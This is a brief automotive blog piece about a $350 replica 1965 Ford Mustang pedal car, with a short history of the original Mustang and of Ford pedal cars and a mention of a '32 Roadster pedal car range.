We doubt many of our crankandpiston massive would turn down a 1965 Ford Mustang. We wouldn’t. And what if this particular model cost just $350? Exactly! One slight drawback, pedals replace the V8 and the car now weighs less than 15 kilos. But yes, we still want one.
Pre-sale predictions were wiped clean when the first generation Ford Mustang – dubbed the ‘1964½’ model having been introduced before the traditional start of the production year – sold more than 318,000 units in its opening three months. Its enormous success meant the MkII would not roll out until 1974. Miniature Ford pedal cars meanwhile had been mass-produced since the Model T, and once again, the Mustang pedal car obliterated sale predictions.
Even 100,000 sales in its first year couldn’t save the pedal car though, with production ceasing in the early ‘70s. Undisturbed until 2005, the design has since been resurrected and incorporated by fordpedalcars.com.
So stringent is the sense of heritage that – save a few tweaks to meet contemporary health and safety standards – the new models follow the original design: steel chassis, adjustable rubber pedals and plastic windscreen. To celebrate the 75th anniversary of another classic Ford, the company has also commissioned a ten-strong pedal car range of ’32 Roadsters, each individually styled by perennial Hot Rod builders in the US. Top speeds have yet to be confirmed though.
